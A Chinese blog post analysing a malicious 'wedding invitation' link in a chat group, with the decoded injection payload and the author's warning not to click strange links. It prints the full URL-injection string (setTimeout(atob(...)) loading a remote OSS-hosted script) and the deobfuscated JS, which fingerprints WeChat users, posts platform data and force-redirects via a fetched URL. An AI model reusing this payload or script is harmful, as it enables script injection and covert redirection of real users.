群裡的一個惡意連結分析過程

劉俊濤的部落格發表於2021-01-19

 

群裡有這樣一個連結,因為是防疫群是不可能邀請大家參加婚禮的。

於是乎好奇的點選了,然而瀏覽器並沒有反應。

複製了連結發下是這樣一個奇怪的地址

https://xxxx.com/mall/index.html?click_type=768123%27;setTimeout(atob(%27dmFyIHNzID0gZG9jdW1lbnQxY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7IHNzLnNyYyA9ICIvL3F3ZTEyMzMyMS5vc3MtY24tYmVpamluZy5hbGl5dW5jcy5jb20vanMvbXNnMjEuanMiOyBkb2N1bWVudC5kb2N1bWVudEVsZW1lbnQuYXBwZW5kQ2hpbGQoc3MpOw==%27)%2c1);//

 

%27 轉碼後 '

%2c1 轉碼後 ,1

setTimeout( ) 一秒後執行

atob( ) : base64解密函式

解密後是一個 js 地址http://xxxxxx.oss-cn-beijing.aliyuncs.com/js/msg21.js

 

開啟發現是一個加密的JS

因為是V5 js 加密的,這塊沒有接觸過。Js的內容無法知道,但是 作者既然不想讓看到,肯定程式碼裡面沒有幹好事。至於是不是盜號或者推廣或是廣告 就不得而知。

 

如此一來: 陌生連結,具有誘惑性的連結,不要點

 

當然這種 包含惡意的連結平臺和也會很快 遮蔽。

以後有機會可以研究一下js解密。

 

更新一下

__________________________________________

解密後的JS

  1 (function () {
  2     var _0xaeeadd = {
  3         'fKPML': function _0x14f0f0(_0x5c3713, _0x1a63d4) {
  4             return _0x5c3713 + _0x1a63d4;
  5         },
  6         'QCLsm': '(^|&)',
  7         'KhmkX': '=([^&]*)(&|$)',
  8         'pkwUU': function _0x32d898(_0xc21c09, _0x5cb8e1) {
  9             return _0xc21c09(_0x5cb8e1);
 10         },
 11         'NImgf': function _0x33b8ae(_0x482fe5, _0x29be10) {
 12             return _0x482fe5 === _0x29be10;
 13         },
 14         'MnKMf': 'Win',
 15         'FNPcq': 'Mac',
 16         'MiFij': function _0x354ab1(_0x1c1e1b, _0x1383fa) {
 17             return _0x1c1e1b && _0x1383fa;
 18         },
 19         'xlxNW': 'uYi',
 20         'HlNCM': function _0xb671d6(_0x5415a8) {
 21             return _0x5415a8();
 22         },
 23         'xbyII': function _0x430a35(_0x4d7c9d, _0x138736) {
 24             return _0x4d7c9d < _0x138736;
 25         },
 26         'PggWd': 'POST',
 27         'pmkHt': 'Content-Type',
 28         'DqzsN': 'application/x-www-form-urlencoded',
 29         'VfEeh': 'rel',
 30         'VjhJK': 'noreferrer',
 31         'CPxCm': 'href',
 32         'dsBeQ': 'type',
 33         'FVmgL': function _0x1ec231(_0x598e3f, _0x42ad76) {
 34             return _0x598e3f(_0x42ad76);
 35         },
 36         'swpDV': 'sid',
 37         'DIwHW': 'aid',
 38         'fSiTS': function _0x3f03f3(_0x2009ea, _0x990f9) {
 39             return _0x2009ea(_0x990f9);
 40         },
 41         'iKdOU': 'https://xxxx/zhuanfa/index/getUrl4',
 42         'iijAp': 'https://www.xxx.xx',
 43         'SRGif': function _0x5aeb01(_0x3cabc9) {
 44             return _0x3cabc9();
 45         },
 46         'OyAtk': function _0x3c3206(_0x2d909a) {
 47             return _0x2d909a();
 48         },
 49         'EysgW': 'dev',
 50         'WtgwP': '【開發模式】',
 51         'RECbh': function _0x54cbc9(_0x2eebf6) {
 52             return _0x2eebf6();
 53         },
 54         'IWljf': 'vvT',
 55         'EAyvE': function _0x26768c(_0x4b9384) {
 56             return _0x4b9384();
 57         },
 58         'MBeJk': function _0x695c5e(_0x5e669c) {
 59             return _0x5e669c();
 60         }
 61     };
 62 
 63     function _0x3aae30(_0x542f79 = null) {
 64         var _0x529546 = new RegExp(_0xaeeadd['fKPML'](_0xaeeadd['QCLsm'], _0x542f79) + _0xaeeadd['KhmkX'], 'i');
 65         var _0x31b98d = window['location']['search']['substr'](0x1)['match'](_0x529546);
 66         if (_0x31b98d != null) return _0xaeeadd['pkwUU'](unescape, _0x31b98d[0x2]);
 67         return null;
 68     }
 69 
 70     function _0x12824a() {
 71         const _0x162822 = navigator['platform'];
 72         const _0x175089 = _0xaeeadd['NImgf'](_0x162822['indexOf'](_0xaeeadd['MnKMf']), 0x0);
 73         const _0xae94b8 = _0x162822['indexOf'](_0xaeeadd['FNPcq']) === 0x0;
 74         const _0x3dcc2c = /micromessenger/ ['test'](navigator['userAgent']['toLowerCase']());
 75         if (_0xaeeadd['MiFij'](_0x3dcc2c, !_0x175089) && !_0xae94b8) {
 76             return !![];
 77         } else {
 78             if ('FTI' !== _0xaeeadd['xlxNW']) {
 79                 return ![];
 80             } else {
 81                 _0xaeeadd['HlNCM'](_0x72f538);
 82                 _0xaeeadd['pkwUU'](_0x191d64, '#');
 83             }
 84         }
 85     }
 86 
 87     function _0x775b3a() {
 88         const _0x4f64dc = navigator['userAgent']['toLowerCase']();
 89         const _0x1860d3 = /micromessenger/;
 90         let _0x53b8bc = ![];
 91         if (_0x1860d3['test'](_0x4f64dc)) {
 92             const _0x1b8303 = _0x4f64dc['search'](_0x1860d3);
 93             let _0x244c59 = '';
 94             for (let _0xa894d5 = _0x1b8303 + 0xf; _0xaeeadd['xbyII'](_0xa894d5, _0x4f64dc['length']); _0xa894d5++) {
 95                 const _0x55e4d3 = _0x4f64dc[_0xa894d5];
 96                 if (/^\d{1,}$/ ['test'](_0x55e4d3) || _0xaeeadd['NImgf'](_0x55e4d3, '.')) {
 97                     _0x244c59 += _0x55e4d3;
 98                 } else {
 99                     break;
100                 }
101             }
102             _0x244c59 = parseFloat(_0x244c59);
103             if (_0x244c59 >= 0x7) _0x53b8bc = !![];
104         }
105         return _0x53b8bc;
106     }
107     var _0x320916 = _0xaeeadd['iijAp'];
108 
109     function _0x72f538() {
110         var _0x31ca84 = new XMLHttpRequest();
111         _0x31ca84['open'](_0xaeeadd['PggWd'], _0x320916 + '/' + _0x1f1b99 + '.xml', !![]);
112         _0x31ca84['setRequestHeader'](_0xaeeadd['pmkHt'], _0xaeeadd['DqzsN']);
113         _0x31ca84['send']('platform=' + navigator['platform']);
114     }
115 
116     function _0x191d64(_0x2d7909) {
117         const _0xe8c4a5 = document['createElement']('a');
118         _0xe8c4a5['setAttribute'](_0xaeeadd['VfEeh'], _0xaeeadd['VjhJK']);
119         _0xe8c4a5['setAttribute'](_0xaeeadd['CPxCm'], _0x2d7909);
120         document['body']['appendChild'](_0xe8c4a5);
121         _0xe8c4a5['click']();
122     }
123 
124     function _0x5ee876() {
125         const _0x507d4c = _0x3aae30(_0xaeeadd['dsBeQ']);
126         const _0x52e6be = _0xaeeadd['FVmgL'](_0x3aae30, _0xaeeadd['swpDV']);
127         const _0x3b61df = _0x3aae30(_0xaeeadd['DIwHW']);
128         let _0x2b07b8 = '';
129         if (_0x507d4c) {
130             _0x2b07b8 = '?type=' + _0x507d4c + '&aid=' + _0x3b61df;
131         }
132         _0xaeeadd['fSiTS'](fetch, _0xaeeadd['iKdOU'])['then'](_0x2f8c1a => _0x2f8c1a['text']())['then'](_0x147f1f =>
133             _0x191d64(atob(_0x147f1f)));
134     }
135     const _0x1f1b99 = Math['random']()['toString'](0x24)['substr'](0x2);
136     if (!_0x12824a() || !_0xaeeadd['SRGif'](_0x775b3a)) {
137         const _0xa26fef = _0xaeeadd['OyAtk'](_0x3aae30);
138         if (_0xa26fef && _0xa26fef[_0xaeeadd['EysgW']]) {
139             console['log'](_0xaeeadd['WtgwP']);
140             _0xaeeadd['OyAtk'](_0x5ee876);
141         } else {
142             _0xaeeadd['RECbh'](_0x72f538);
143             _0x191d64('#');
144         }
145     } else {
146         if (_0xaeeadd['NImgf'](_0xaeeadd['IWljf'], 'Cgo')) {
147             console['log'](_0xaeeadd['WtgwP']);
148             _0xaeeadd['EAyvE'](_0x5ee876);
149         } else {
150             _0xaeeadd['MBeJk'](_0x5ee876);
151         }
152     }
153 }());;
154 (function (_0xe5cddc, _0xb8de6b, _0x4ff679) {
155     var _0x1b14d7 = {
156         'Kyljy': 'undefined',
157         'syTvc': 'jsjiami.com.v5',
158         'GkGtd': '刪除版本號,js會定期彈窗'
159     };
160     _0x4ff679 = 'al';
161     try {
162         _0x4ff679 += 'ert';
163         _0xb8de6b = encode_version;
164         if (!(typeof _0xb8de6b !== _0x1b14d7['Kyljy'] && _0xb8de6b === _0x1b14d7['syTvc'])) {
165             _0xe5cddc[_0x4ff679]('刪除' + '版本號,js會定期彈窗,還請支援我們的工作');
166         }
167     } catch (_0x3249a0) {
168         _0xe5cddc[_0x4ff679](_0x1b14d7['GkGtd']);
169     }
170 }(window));;
171 encode_version = 'jsjiami.com.v5'

 

 這個js 後面對應有一個TP後臺,對應的有非常多的域名 ,至於域名下這個後臺是收集社麼資訊的 就不扒了。水平有限

 

 

文章來源:劉俊濤的部落格歡迎關注公眾號、留言、評論,一起學習。

__________________________________________________________________________________

若有幫助到您,歡迎點選推薦,您的支援是對我堅持最好的肯定(*^_^*)

相關文章